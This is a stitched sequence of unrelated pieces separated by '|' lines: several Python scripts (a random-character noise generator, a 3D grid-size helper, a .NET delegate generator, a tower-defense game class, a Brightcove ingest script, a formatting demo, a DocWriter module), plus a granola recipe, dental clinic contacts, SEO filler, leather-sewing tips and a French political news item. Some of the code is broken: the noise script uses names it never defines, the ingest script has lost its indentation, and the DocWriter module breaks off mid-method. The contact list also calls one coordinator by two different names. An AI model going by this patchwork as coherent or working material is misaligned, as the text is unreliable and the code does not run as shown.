# When True, variants are written to files instead of printed to the terminal:
SAVE_TO_RND_FILENAMES = False
VARIANTS_TO_GENERATE = 1000000
CHARS_PER_LINE = 80
LINES_PER_GENERATED_SET = 16 # Also try e.g. 2
# The following is not used in the script if SAVE_TO_RND_FILENAMES is True.
# REFERENCE: 1,000 ms = 1 second:
WAIT_BETWEEN_LINES_MS = 142 # some oft-used choices: 82, 142
# DERIVATIVE VALUES SET FROM GLOBALS:
SLEEP_TIME = WAIT_BETWEEN_LINES_MS * 0.001
# Function intended use: if a controlling boolean is true, gets and
# returns a unique subset of characters from string CHARSET_STRING_PARAM;
# otherwise returns the string unmodified:
def get_charset_subset(CHARSET_STRING_PARAM):
    """If CHOOSE_RND_SUBSET is True, return a random subset of unique
    characters from CHARSET_STRING_PARAM (roughly 4%-31% of the pool,
    minimum two); otherwise return the string unmodified."""
    if (CHOOSE_RND_SUBSET == True):
        subset_select_percent = random.uniform(0.04,0.31)
        loc_operative_charset_len = len(CHARSET_STRING_PARAM)
        num_chars_in_subset = int(loc_operative_charset_len * subset_select_percent)
        # If that ends up being less than two, set it to two:
        if (num_chars_in_subset < 2):
            num_chars_in_subset = 2
        counter = 0
        tmp_string = ""
        while counter < num_chars_in_subset:
            # BUGFIX: draw from the parameter, not the global CHARSET. The
            # index range was computed from the parameter's length, so using
            # the global could mis-index or return characters outside the
            # requested pool whenever the two strings differ.
            chosen_char = CHARSET_STRING_PARAM[random.randrange(0, loc_operative_charset_len)]
            if chosen_char not in tmp_string:
                tmp_string += chosen_char
                counter += 1
        return tmp_string
    else:
        return CHARSET_STRING_PARAM
def get_rnd_save_file_name():
    """Return a random 19-character file-name stem drawn from an unambiguous
    alphanumeric alphabet (no 0/O, 1/l/I)."""
    alphabet = "abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ23456789"
    pool_size = len(alphabet)
    return "".join(alphabet[random.randrange(0, pool_size)] for _ in range(19))
# MAIN LOOP: emit VARIANTS_TO_GENERATE noise blocks, either printed to the
# terminal (throttled by SLEEP_TIME) or written to numbered random file names.
n_set_outputs_counter = 0
digits_to_pad_file_numbers_to = len(str(VARIANTS_TO_GENERATE))
while n_set_outputs_counter < VARIANTS_TO_GENERATE:
    n_set_outputs_counter += 1
    # To collect character noise block sample for saving to file (not only for
    # printing to screen) ; there's a trivial performance penalty here if we don't use this str:
    super_string = ""
    operative_charset = get_charset_subset(CHARSET)
    operative_charset_len = len(operative_charset)
    lines_counter = 0
    while lines_counter < LINES_PER_GENERATED_SET:
        # Build one line of CHARS_PER_LINE random characters.
        rnd_string = ""
        char_counter = 0
        while char_counter < CHARS_PER_LINE:
            rnd_string += operative_charset[random.randrange(0, operative_charset_len)]
            char_counter += 1
        # Only print rnd block chars to terminal if we're not saving files; otherwise,
        # collect them in super_string:
        if (SAVE_TO_RND_FILENAMES == False):
            print(rnd_string)
            sleep(SLEEP_TIME)
        else:
            super_string += rnd_string + "\n"
        lines_counter += 1
    # If a boolean says to save the collected rnd chars to a file, do so:
    if (SAVE_TO_RND_FILENAMES == True):
        save_file_name = get_rnd_save_file_name()
        # get number padded to number of zeros to align numbers to VARIANTS_TO_GENERATE,
        # for file name; therefore convert n_set_outputs_counter to string for zfill function:
        str_n_set_outputs_counter = str(n_set_outputs_counter)
        file_number_zero_padded = str_n_set_outputs_counter.zfill(digits_to_pad_file_numbers_to)
        file = open(file_number_zero_padded + "__" + save_file_name + '.txt', "w")
        file.write(super_string)
        file.close()
        # print("DONE creating variant", n_set_outputs_counter, "in run.")
|
Granola Bars – everything for a good night's sleep….
Home Gym Granola Bars – everything for a good night's sleep….
In my post Sleep and Performance, I talked about different patterns of sleep and how important sleep is to performance, and in last week's post, Sleep Nutrition, I linked a good night's sleep to good nutrition. This granola bar recipe was originally adapted as a sports energy bar but contains many ingredients that have been associated with benefits in sleep research. Great with milk or yoghurt at breakfast, before an afternoon match or training session, or even after an evening game.
Pre-heat oven to 180 degree C. Line shallow flat sided baking tray with parchment paper.
In a large bowl, mix together the oats, brown sugar, wheat germ, cinnamon, flour and salt. Make a crater in the middle and add in the honey, egg, oil and vanilla. Mix well.
Add cherries, almonds, mixed nuts and berries and chocolate if you are adding any.
Tip into prepared baking tray and pat down evenly.
Bake for 30-35 minutes in the preheated oven until the bars begin to turn golden around the edges. Cut them in the tin while still hot from the oven, but allow them to cool completely before tipping them out.
|
import sys
import math
def produce_size_strings(begin, end, base=2, n_dims=3):
    """ function that produces 3D grid sizes in power-of-2 manner
    example: produce_size_strings(4, 6):
    16x16x16
    32x16x16
    32x32x16
    32x32x32
    64x32x32
    64x64x32
    64x64x64

    Dimensions grow one at a time from base**begin up to (and including)
    base**end; returns the list of "AxBxC" strings ([] when begin > end).
    """
    value = []
    if begin > end:
        # print(...) with a single argument is valid in both Python 2 and 3.
        print("unable to produce strings between %i and %i" % (begin, end))
        return value
    # BUGFIX: the end exponent is inclusive -- the docstring example reaches
    # 64x64x64 for end=6, but range(begin, end) stopped one power short and
    # crashed (empty cardinals list) for begin == end.
    cardinals_exponents = range(begin, end + 1)
    cardinals = [str(int(math.pow(base, c))) for c in cardinals_exponents]
    start_size = "x".join([cardinals[0]]*n_dims)
    value.append(start_size)
    end_size = "x".join([cardinals[-1]]*n_dims)
    cardinal_idx = 1
    while (start_size != end_size) and (cardinal_idx < len(cardinals)):
        previous = start_size
        temp_li = start_size.split("x")
        # Replace the first remaining occurrence of the previous cardinal with
        # the current one, growing one dimension per iteration.
        for it in temp_li:
            if (it == cardinals[cardinal_idx-1]):
                temp_li[temp_li.index(it)] = cardinals[cardinal_idx]
                break
        start_size = "x".join(temp_li)
        if previous != start_size:
            value.append(start_size)
        else:
            # Nothing left to replace at this cardinal; advance to the next.
            cardinal_idx += 1
    return value
if __name__ == '__main__':
    # CLI wrapper (Python 2 print syntax). Accepted argv forms:
    #   script end | script begin end | script begin end base
    sargv = sys.argv
    # TODO: maybe wanna give something in through sys.argv
    begin = 6
    end = 10
    base = 2
    if len(sargv) == 3:
        begin = int(sargv[-2])
        end = int(sargv[-1])
    if len(sargv) == 2:
        end = int(sargv[-1])
    if len(sargv) == 4:
        begin = int(sargv[-3])
        end = int(sargv[-2])
        base = int(sargv[-1])
    res = produce_size_strings(begin, end, base)
    # Exit status: 0 when sizes were produced, 1 otherwise.
    if res:
        print "\n".join(res)
        sys.exit(0)
    else:
        sys.exit(1)
|
Stacy Ecklund is our Implant Coordinator for our Duluth Office.
If you have any questions or concerns regarding your treatment plan or any questions about Dental Implants, please feel free to contact Stacy directly at Duluth Office Phone Number (218) 722-8377.
Melanie Sterns is our Implant Coordinator for our Hibbing Office.
If you have any questions or concerns regarding your treatment plan or any questions about Dental Implants, please feel free to contact Mel directly at Hibbing Office Phone Number (218) 362-6222.
Alice Sand is our Implant Coordinator for our Ashland Office.
If you have any questions or concerns regarding your treatment plan or any questions about Dental Implants, please feel free to contact Jo directly at Ashland Office Phone Number (715) 682-2660.
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
from generate import generate
# Func<> delegates take up to MaxTypes arguments plus one return type slot.
MaxTypes = 16

def gen_delegate_func(cw):
    """Write the switch cases mapping an arity onto typeof(Func<...>)."""
    for arity in range(1, MaxTypes + 2):
        # arity counts all generic slots; arity - 1 commas separate them.
        cw.write("case %(length)d: return typeof(Func<%(targs)s>).MakeGenericType(types);",
                 length=arity, targs="," * (arity - 1))
def gen_delegate_action(cw):
    """Write the switch cases mapping an arity onto typeof(Action<...>)."""
    for arity in range(1, MaxTypes + 1):
        cw.write("case %(length)d: return typeof(Action<%(targs)s>).MakeGenericType(types);",
                 length=arity, targs="," * (arity - 1))
def gen_max_delegate_arity(cw):
    """Write the MaximumArity constant (MaxTypes arguments plus the return)."""
    cw.write('private const int MaximumArity = {};'.format(MaxTypes + 1))
def main():
    """Register the (region name, generator) pairs with the generate driver."""
    return generate(
        ("Delegate Action Types", gen_delegate_action),
        ("Delegate Func Types", gen_delegate_func),
        ("Maximum Delegate Arity", gen_max_delegate_arity),
        # outer ring generators
        ("Delegate Microsoft Scripting Action Types", gen_delegate_action),
        ("Delegate Microsoft Scripting Scripting Func Types", gen_delegate_func),
    )

if __name__ == "__main__":
    main()
|
Background: Data Entry requires that the version match Crash Magic.
As Crash Magic is upgraded, and new features are added to the SOAP system, Data entry may become incompatible. Strict versioning is enforced to prevent unpredictable behaviors in Data Entry.
The desired CMO version must also appear in the “Allowed Versions” edit.
The desired CMO Versions must be compiled into this version of the application. This can be found in AllowedCMOVersionsU.pas file.
|
#geneaTD - A multi-touch tower defense game.
#Copyright (C) 2010-2011 Frederic Kerber, Pascal Lessel, Michael Mauderer
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#For more information contact the geneaTD team: info@geneatd.de
#
from libavg import *
from libavg.utils import getMediaDir
from creature import Creature
import os
import util
class Tower(object):
    """
    This class represents a normal tower object.

    Tapping a tower triggers a one-shot explosion that damages every enemy
    creature inside its range circle, then removes the tower.
    """
    # A Map of all towers: id --> object.
    towers = {}
    # All towers of player 1.
    tower1 = []
    # All towers of player 2.
    tower2 = []

    def die(self):
        """
        This method destroys the tower (unlinks the libAVG nodes).
        """
        if self.living:
            self.living = False
            if self.team.id==1:
                self.tower1.remove(self)
            else:
                self.tower2.remove(self)
            del Tower.towers[id(self)]
            # unlink(True) also releases the nodes' resources.
            self.towerDiv.unlink(True)
            self.tower.unlink(True)
            # NOTE(review): adds 25 to the tower's own team score; confirm the
            # intended semantics in team.adjustScore.
            self.team.adjustScore(25)

    def getDistance(self, creature):
        """
        Returns the distance from the given creature to the tower.
        """
        return mathutil.getDistance(self.pos, creature.getCirclePos())

    def getCreaturesInExplosionRange(self):
        """
        A getter for the creatures in range that should be affected.

        Only the opposing player's creatures are candidates; a copy of the
        list is returned so callers can iterate while creatures die.
        """
        creatureList = Creature.creatures2
        if self.team.id == 2:
            creatureList = Creature.creatures1
        return creatureList[:]

    def executeTowerEffect(self, creatureList):
        """
        Executes the special tower effect on the creatures that are given.
        """
        for creature in creatureList:
            dist = self.getDistance(creature)
            # Circles overlap when the distance is at most the sum of radii.
            if dist > self.towerCircle.r + creature.r:
                continue
            else:
                creature.damage(2)

    def executeTowerDestroyAnimation(self):
        """
        The animation that happens if tower is clicked. Should call the die method afterwards.
        """
        self.explosionCircle = avg.CircleNode(fillopacity=0.0, strokewidth=2, color=self.destroyCircleColor, pos=(self.towerDiv.size.x // 2, self.towerDiv.size.x // 2), parent=self.towerDiv)
        # Grow the ring from the sprite radius to the range radius over 300 ms,
        # then destroy the tower via the die() callback.
        anim = avg.LinearAnim(self.explosionCircle, "r", 300 , self.tower.size.x // 2, self.towerCircle.r, False, None, self.die)
        anim.start()

    def towerExplosion(self, event):
        """
        Boom. CURSOR_DOWN handler; a tower can explode only once.
        """
        if not self.alreadyExploded:
            self.alreadyExploded = True
            # Ignore further touches while the destroy animation runs.
            self.towerDiv.sensitive = False
            creatureList = self.getCreaturesInExplosionRange()
            self.executeTowerEffect(creatureList)
            self.executeTowerDestroyAnimation()

    def setAppearance(self):
        """
        A setter for the appearance of the tower.
        """
        # Div centered on self.pos that holds the range circle.
        self.towerDiv = avg.DivNode(size=util.towerDivSize, pos=(self.pos.x - util.towerDivSize[0] // 2, self.pos.y - util.towerDivSize[1] // 2))
        #sets the explosion radius
        self.towerCircle = avg.CircleNode(fillopacity=0.3, strokewidth=0, fillcolor=self.team.color, r=self.towerDiv.size.x // 2, pos = (self.towerDiv.size.x // 2, self.towerDiv.size.y // 2), parent=self.towerDiv)
        # The clickable tower sprite itself (textured rectangle).
        self.tower = avg.RectNode(fillopacity=1, strokewidth=0, filltexhref=os.path.join(getMediaDir(__file__, "resources"), "blackball.png"), size=util.towerSize, pos=(self.pos.x - util.towerSize[0] // 2, self.pos.y - util.towerSize[1] // 2))

    def __init__(self, team, pos, layer, creatureLayer):
        """
        Creates a new tower instance (including libAVG nodes).
        team: the team, the tower belongs to.
        pos: the position of the tower.
        layer: the layer the tower's range circle is placed on.
        creatureLayer: the layer the clickable tower sprite is appended to.
        """
        self.living = True
        self.pos = pos
        self.team = team
        self.layer = layer
        self.setAppearance()
        self.alreadyExploded =False
        self.destroyCircleColor="FFA500"
        # Register the tower under its Python id for global lookup.
        tid = id(self)
        self.towerDiv.id = str(tid)
        Tower.towers[tid] = self
        if self.team.name == "Team2":
            Tower.tower2.append(self)
        else:
            Tower.tower1.append(self)
        self.tower.subscribe(Node.CURSOR_DOWN, self.towerExplosion)
        creatureLayer.appendChild(self.tower)
        layer.appendChild(self.towerDiv)
|
Published at Sunday, April 21st, 2019 - 4:46 AM. 4 Wiring Diagram. By Lindsey S. Sexton.
Thank You for visiting our site. Nowadays were excited to announce that we have found an extremely interesting niche to be discussed, namely 4 gang toggle switch wiring diagram boat. Most people trying to find info about 4 gang toggle switch wiring diagram boat and definitely one of them is you, is not it?
There are many main reasons why you are searching for specifics about 4 gang toggle switch wiring diagram boat, but certainly, you are researching for different ideas for your needs. We identified this on the web sources and we believe this can be one of many wonderful material for reference. And you know, when I first found it, we loved it, hopefully you are too. We believe, we may own different opinion, but, what we do just want to help you find more references regarding 4 gang toggle switch wiring diagram boat.
Regarding Photo detailed description: Photo has been submitted by Lindsey S. Sexton. We thank you for your visit to our website. Make sure you get the information you are looking for. Do not forget to share and love our reference to help further develop our website.
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
#This is a JSON parser version of our script. Sometimes you can change a feed from JSON to MRSS by changing a parameter in the URL from JSON to MRSS. But just in case...
import BC_01
import json
import requests
r = requests.get('[Insert your JSON feed URL here]')
json = json.loads(r.text)
response_array = []
#counter = 0
for index, item in enumerate(json['items']):
if index <= 2:
print item['name']
print item['id']
#print item['FLVURL']
print item['tags']
print item['shortDescription']
#print item['adKeys']
renditions = item['renditions']
max_url = None
max_bitrate = 0
#So since we're dealing with a dictionary
#we can get the nested "renditions" by saying item['renditions']
#renditions itself is a list of dictionaries, so we say for each
#dictionary (which we call rend) in the rendition list
#check if its encodingRate (ie bitrate) is larger than the
#biggest bitrate we've seen so far in the renditions list
#if it is, assign the max_url and max_bitrate variables for the
#current rendition's url and encodingRate
#note that we set max_bitrate = 0 on line 27 so that means for each
#item in the feed we find the maximum bitrate for that item's rendition list
for rend in renditions:
if rend['encodingRate'] > max_bitrate:
max_url = rend['url']
max_bitrate = rend['encodingRate']
print "MAX url", max_url, max_bitrate
#counter += 1
vid_url = max_url
item['url'] = vid_url
item['bit_rate'] = max_bitrate
response_array.append(item)
refactored = []
for entity in response_array:
new_el = entity
new_el["name"] = entity["name"]
new_el["description"] = entity["shortDescription"]
del new_el["bit_rate"]
refactored.append(new_el)
#print json.dumps(response_array, indent=4)
for idx,item in enumerate(refactored):
if idx <= 2:
name, url = item['name'], item['url']
tags = item["tags"] if "tags" in item else []
desc = item["description"] if "description" in item else ""
if not BC_01.videoNameExists(name):
print "did not see", name, "in brightcove, ingesting..."
print "working on", name, url
BC_01.createAndIngest(name, url, tags=tags, description=desc)
else:
print "already saw", name, "skipping..."
|
Leather is one of the most popular choices for clothing, and that is because it is both durable and fashionable. Animal lovers also have an alternative, as faux leather is a great replacement. While it looks amazing, sewing leather can be really difficult.
Here are some things you need to know about sewing leather before you begin and these tips should make the job easier for you.
It does not matter whether you are working with leather or faux leather, you must use a new needle in your sewing machine. Additionally, it is recommended that you choose a needle which was designed for leather.
Sewing leather is trickier than regular fabrics, and that is because you will leave a permanent hole with each stitch. This means that mistakes are not allowed. Make sure that you do your fitting before you begin sewing.
You should also avoid pins because they will damage the leather. It is recommended that you use them only within seam allowances. However, this should not worry you, as there are many alternatives such as binder clips, tape, hair clips or paper clips. If you want to buy something that was designed for sewing, you can find special clips at fabric stores.
You should choose your thread carefully as well. It is recommended that you use polyester or nylon threads because they are more durable and they won’t be affected by the leather. Most projects will require waxed thread.
Before you decide which kind of seam you should have, you must think about the look you are going for. There are many options, from plain seams and lapped seams to faux flat fell seams and single or double topstitched ones. For plain seams, you should use leather adhesive to glue the seam allowances and then use a wallpaper roller to seal them.
When you use patterns, you must remember to transfer the markings on the wrong side of the fabric. You should use tailor’s chalk and marking pens for this, and avoid marking wheels and traditional transfer paper.
Not all machines can handle leather properly. If you work with leather a lot, you should consider buying a sewing machine that can handle it. You can find some of the best options here: https://bestsewingmachines.reviews/for-leather.
If you use a piece of scotch tape over the bottom of a universal foot, you will notice that it glides easily over the leather. This way leather won’t stick to the presser foot anymore, and it will be easier for sewing leather. You can also use a Teflon foot or a roller foot.
With these tips, you should have an easier time sewing leather and doing all those leather projects you pinned on Pinterest. Unlike those handmade beaded necklaces, leather projects will last a lifetime!
Shop Grey Sweatpants, Fashion Jackets, Long Dresses, Black Gowns Dress and more. Get this widget.
|
#!/usr/bin/python
# _*_ coding: utf-8 _*_
# Demo of Python 2 output formatting: str()/repr(), column alignment
# (rjust/ljust/center/zfill), str.format and %-formatting.
import math
print ""
# str() converts a value into a human-readable form
# repr() converts a value into a form readable by the interpreter
s = 'Hello, World'
print str(s)
print repr(s)
print str(1 / 7)  # Python 2 integer division: prints 0
x = 10 * 3.25
y = 200 * 200
s = 'The value of x is ' + repr(x) + ', and y is ' + repr(y) + '...'
print s
hello = 'hello, world\n'
hellos = repr(hello)  # repr() keeps the \n escape visible
print hello
print hellos
print repr((x, y, ('hello', 'world')))
print str((x, y, ('hello', 'world')))
# Right-, left-, and center-justified squares and cubes in columns.
for x in range(1, 11):
    print repr(x).rjust(2), repr(x * x).rjust(3),
    #print repr(x * x * x).rjust(4)
    print repr(x * x * x).ljust(4),
    print repr(x * x * x).center(4)
# Same table via str.format field widths.
for x in range(1, 11):
    print '{0:2d} {1:3d} {2:4d}'.format(x, x * x, x * x * x)
x = '123456'
print x.ljust(3)[:3]  # ljust never truncates; slice to force the width
y = '-3.1415'
print x.zfill(10)
print y.zfill(10)  # zfill keeps the sign in front of the zeros
# Positional, named, and precision format fields.
print 'we are the {} who say "{}!"'.format('knight', 'Ni')
print 'The story of {0}, {1}, and {other}'.format('Bill', 'Manfred', other =\
    'Georg')
print 'The value of PI is approximately {0:.3f}.'.format(math.pi)
# Dict values via item access ({0[key]}) and via ** unpacking.
table = {'Louis': 1990, 'Shana': 2006, 'Miku': 2000}
for name, birthday in table.items():
    print '{0:10} ==> {1:10d}'.format(name, birthday)
print 'Louis: {0[Louis]:d}; Shana: {0[Shana]:d}; Miku: {0[Miku]:d}'\
    .format(table)
print 'Louis: {Louis:d}; Shana: {Shana:d}; Miku: {Miku:d}'.format(**table)
# Old-style %-formatting equivalent.
print 'The value of PI is approximately %5.3f.' % math.pi
|
Charly Triballeau, AFP | Richard Ferrand on a visit to Deauville, Normandy, on May 29, 2017.
A French prosecutor has opened a preliminary investigation into the "past activities" of France's minister of territorial integration, Richard Ferrand, a close ally of President Emmanuel Macron.
Eric Mathais, the public prosecutor from the Breton city of Brest, said Thursday that the decision to open a probe was motivated by new media reports about Ferrand's business and financial dealings.
The issue is particularly salient given that France's newly elected president took office amid promises that politics-as-usual would be a thing of the past and his government would be squeaky clean.
But just weeks into Macron's nascent presidency, Ferrand has come under growing pressure for business practices that carry undertones of potential conflicts of interest.
Weekly newspaper Le Canard Enchaîné reported last week that an insurance company struck a rental deal with a company owned by Ferrand's partner when he led the firm.
A report published in Le Monde newspaper on Tuesday said the insurance company had contracts with both Ferrand's ex-wife and his current companion.
The newspaper also reported that Ferrand advocated for a bill advantageous to insurance companies in 2012, when he was a lawmaker.
Ferrand has denied any wrongdoing, and both Macron and his prime minister, Édouard Philippe, have expressed their support.
The controversy comes as a law to prohibit politicians from hiring family members, an issue that dogged conservative presidential candidate François Fillon, is to be formally presented to parliament next week.
A former Socialist, Ferrand was among the first to rally behind Macron, becoming his right-hand man during the campaign for the presidency.
Macron is now hoping a two-round legislative election on June 11-18 will hand him a majority in parliament and consolidate his grip on power.
|
"""
DocWriter is a tool for writing documents in ASCII, HTML,
LaTeX, DocOnce, and other formats based on input from Python
datastructures.
The base class _BaseWriter defines common functions and data
structures, while subclasses HTML, DocOnce, etc. implement (i.e.,
write to) various formats.
This module works, but is unfinished and needs documentation!
"""
from StringIO import StringIO
import re, os, glob, commands
class _BaseWriter:
    """
    Base class for document writing classes.
    Each subclass implements a specific format (html, latex,
    rst, etc.).
    """

    def __init__(self, format, filename_extension):
        # format: name of the target format (e.g. 'html');
        # filename_extension: appended to the stem in write_to_file
        # use StringIO as a string "file" for writing the document:
        self.file = StringIO()
        self.filename_extension = filename_extension
        self.format = format
        self._footer_called = False  # guard: write the footer only once

    # read-only view of the in-memory buffer
    document = property(fget=lambda self: self.file.getvalue(),
                        doc='Formatted document as a string')

    def write_to_file(self, filename):
        """
        Write formatted document to a file.
        Just give the stem of the file name;
        the extension will be automatically added (depending on the
        document format).
        """
        # footer?
        if not self._footer_called:
            self.footer()
            self._footer_called = True
        f = open(filename + self.filename_extension, 'w')
        f.write(self.document)
        f.close()

    def __str__(self):
        """Return formatted document."""
        return self.document

    def header(self):
        """Header as required by format. Called in constructor."""
        pass

    def footer(self):
        """Footer as required by format. Called in write_to_file."""
        pass

    def not_impl(self, method):
        # common hook: raised by constructs a subclass does not support
        raise NotImplementedError, \
              'method "%s" in class "%s" is not implemented' % \
              (method, self.__class__.__name__)

    def title(self, title, authors_and_institutions=[], date='today'):
        """
        Provide title and authors.

        @param title: document title (string).
        @param authors_and_institutions: list of authors and their
        associated institutions, where each list item is a tuple/list
        with author as first element followed by the name of all
        institutions this author is associated with.
        @param date: None implies no date, while 'today' generates
        the current date, otherwise a string is supplied.
        """
        self.not_impl('title')

    def today_date(self):
        """Return a string with today's date suitably formatted."""
        import time
        return time.strftime('%a, %d %b %Y (%H:%M)')

    def section(self, title, label=None):
        """
        Write a section heading with the given title and an optional
        label (for navigation).
        """
        self.not_impl('section')

    def subsection(self, title, label=None):
        """
        Write a subsection heading with the given title and an optional
        label (for navigation).
        """
        self.not_impl('subsection')

    def subsubsection(self, title, label=None):
        """
        Write a subsubsection heading with the given title and an optional
        label (for navigation).
        """
        self.not_impl('subsubsection')

    def paragraph(self, title, ending='.', label=None):
        """
        Write a paragraph heading with the given title and an ending
        (period, question mark, colon) and an optional label (for navigation).
        """
        self.not_impl('paragraph')

    def paragraph_separator(self):
        """
        Add a (space) separator between running paragraphs.
        """
        self.not_impl('paragraph_separator')

    def text(self, text, indent=0):
        """
        Write plain text. Each line can be idented by a given number
        of spaces.
        """
        # do the indentation here, subclasses should call this method first
        text = '\n'.join([' '*indent + line for line in text.split('\n')])
        # subclasses must substitute DocOnce simple formatting
        # using the expandtext method
        return text

    def expandtext(self, text, tags, tags_replacements):
        """
        In a string text, replace all occurences of strings defined in tags
        by the corresponding strings defined in tags_replacements.
        Both tags and tags_replacements are dictionaries with keys such
        as 'bold', 'emphasize', 'verbatim', 'math', and values consisting of
        regular expression patterns.

        This method allows application code to use some generic ways of
        writing emphasized, boldface, and verbatim text, typically in the
        DocOnce format with *emphasized text*, _boldface text_, and
        `verbatim fixed font width text`.
        """
        for tag in tags:
            tag_pattern = tags[tag]
            c = re.compile(tag_pattern, re.MULTILINE)
            try:
                tag_replacement = tags_replacements[tag]
            except KeyError:
                # target format defines no substitution for this tag
                continue
            if tag_replacement is not None:
                text = c.sub(tag_replacement, text)
        return text

    def list(self, items, listtype='itemize'):
        """
        Write list or nested lists.

        @param items: list of items.
        @param listtype: 'itemize', 'enumerate', or 'description'.
        """
        # call _BaseWriter.unfold_list to traverse the list
        # and use self.item_handler to typeset each item
        self.not_impl('list')

    def unfold_list(self, items, item_handler, listtype, level=0):
        """
        Traverse a possibly nested list and call item_handler for
        each item. To be used in subclasses for easy list handling.

        @param items: list to be processed.
        @param item_handler: callable, see that method for doc of arguments.
        @param listtype: 'itemize', 'enumerate', or 'description'.
        @param level: the level of a sublist (0 is main list, increased by 1
        for each sublevel).
        """
        # check for common error (a trailing comma...):
        if isinstance(items, tuple) and len(items) == 1:
            raise ValueError, 'list is a 1-tuple, error? If there is '\
                  'only one item in the list, make a real Python list '\
                  'object instead - current list is\n(%s,)' % items
        item_handler('_begin', listtype, level)
        for i, item in enumerate(items):
            if isinstance(item, (list,tuple)):
                # nested sublist: recurse one level deeper
                self.unfold_list(item, item_handler, listtype, level+1)
            elif isinstance(item, basestring):
                if listtype == 'description':
                    # split out keyword in a description list:
                    parts = item.split(':')
                    keyword = parts[0]
                    item = ':'.join(parts[1:])
                    item_handler(item, listtype, level, keyword)
                else:
                    item_handler(item, listtype, level)
            else:
                raise TypeError, 'wrong %s for item' % type(item)
        item_handler('_end', listtype, level)

    def item_handler(self, item, listtype, level, keyword=None):
        """
        Write out the syntax for an item in a list.

        @param item: text assoicated with the current list item. If item
        equals '_begin' or '_end', appropriate begin/end formatting of
        the list is written instead of an ordinary item.
        @param listtype: 'itemize, 'enumerate', or 'description'.
        @param level: list level number, 0 is the mainlist, increased by 1
        for each sublist (the level number implies the amount of indentation).
        @param keyword: the keyword of the item in a 'description' list.
        """
        self.not_impl('item_handler')

    def verbatim(self, code):
        """
        Write verbatim text in fixed-width form
        (typically for computer code).
        """
        self.not_impl('verbatim')

    def math(self, text):
        """Write block of mathematical text (equations)."""
        # default: dump raw
        self.raw(text)

    def raw(self, text):
        """Write text directly 'as is' to output."""
        self.file.write(text)

    def figure_conversion(self, filename, extensions):
        """
        Convert filename to an image with type according to
        extension(s).
        The first existing file with an extension encountered in the extensions
        list is returned. If no files with the right extensions are found,
        the convert utility from the ImageMagick suite is used to
        convert filename.ps or filename.eps to filename + extensions[0].
        """
        if not isinstance(extensions, (list,tuple)):
            extensions = [extensions]
        for ext in extensions:
            final = filename + ext
            if os.path.isfile(final):
                return final
        final = filename + extensions[0]  # convert to first mentioned type
        files = glob.glob(filename + '*')
        # first convert from ps or eps to other things:
        for file in files:
            stem, ext = os.path.splitext(file)
            if ext == '.ps' or ext == '.eps':
                cmd = 'convert %s %s' % (file, final)
                print cmd
                failure = os.system(cmd)
                if failure:
                    print 'Could not convert;\n %s' % cmd
                return final
        # try to convert from the first file to the desired format:
        file = files[0]
        cmd = 'convert %s %s' % (file, final)
        print cmd
        failure, outtext = commands.getstatusoutput(cmd)
        if failure:
            print 'Could not convert;\n %s' % cmd
        return final

    def figure(self, filename, caption, width=None, height=None, label=None):
        """
        Insert a figure into the document.
        filename should be without extension; a proper extension is added,
        and if the figure is not available in that image format, the
        convert utility from ImageMagick is called to convert the format.
        """
        self.not_impl('figure')

    def table(self, table, column_headline_pos='c', column_pos='c'):
        """
        Translates a two-dimensional list of data, containing strings or
        numbers, to a suitable "tabular" environment in the output.

        @param table: list of list with rows/columns in table, including
        (optional) column-headline 1st row and row-headline 1st column.
        @param column_pos: specify the l/c/r position of data
        entries in columns, give either (e.g.) 'llrrc' or one char
        (if all are equal).
        @param column_headline_pos : position l/c/r for the headline row
        """
        self.not_impl('table')

    def url(self, url_address, link_text=None):
        """Typeset an URL (with an optional link)."""
        self.not_impl('url')

    def link(self, link_text, link_target):
        """Typeset a hyperlink."""
        self.not_impl('link')
# what about LaTeX references to labels in equations, pages, labels?
def makedocstr(parent_class, subclass_method):
    """
    Compose a string (to be used as doc string) from a method's
    doc string in a parent class and an additional doc string
    in a subclass version of the method.

    @param parent_class: class object for parent class.
    @param subclass_method: method object for subclass.
    @return: parent_class.method.__doc__ + subclass_method.__doc__
    """
    parent_method = getattr(parent_class, subclass_method.__name__)
    docstr = parent_method.__doc__
    if subclass_method.__doc__ is not None and \
       subclass_method is not parent_method:
        # bugfix: this line referenced the undefined name subclass_func,
        # raising NameError whenever a subclass added its own doc string;
        # the (docstr or '') guard also tolerates an undocumented parent.
        docstr = (docstr or '') + subclass_method.__doc__
    return docstr
# regular expressions for inline tags:
# (these are taken from doconce.common.INLINE_TAGS)
# The begin/end groups capture the characters that may legally surround a
# tag so substitutions can re-insert them (see _BaseWriter.expandtext).
inline_tag_begin = r'(?P<begin>(^|[(\s]))'
inline_tag_end = r'(?P<end>($|[.,?!;:)\s]))'
INLINE_TAGS = {
    # math: text inside $ signs, as in $a = b$, with space before the
    # first $ and space, comma, period, colon, semicolon, or question
    # mark after the enclosing $.
    'math':
    r'%s\$(?P<subst>[^ `][^$`]*)\$%s' % \
    (inline_tag_begin, inline_tag_end),

    # $latex text$|$pure text alternative$
    'math2':
    r'%s\$(?P<latexmath>[^ `][^$`]*)\$\|\$(?P<puretext>[^ `][^$`]*)\$%s' % \
    (inline_tag_begin, inline_tag_end),

    # *emphasized words*
    'emphasize':
    r'%s\*(?P<subst>[^ `][^*`]*)\*%s' % \
    (inline_tag_begin, inline_tag_end),

    # `verbatim inline text is enclosed in back quotes`
    'verbatim':
    r'%s`(?P<subst>[^ ][^`]*)`%s' % \
    (inline_tag_begin, inline_tag_end),

    # _underscore before and after signifies bold_
    'bold':
    r'%s_(?P<subst>[^ `][^_`]*)_%s' % \
    (inline_tag_begin, inline_tag_end),
    }
class DocOnce(_BaseWriter):
    """Document writer emitting DocOnce markup (.do.txt)."""

    def __init__(self):
        _BaseWriter.__init__(self, 'DocOnce', '.do.txt')

    # NOTE: the loop at the bottom of this class copies doc strings from
    # _BaseWriter for the listed methods, so those methods deliberately
    # carry no doc strings of their own.

    def title(self, title, authors_and_institutions=[], date='today'):
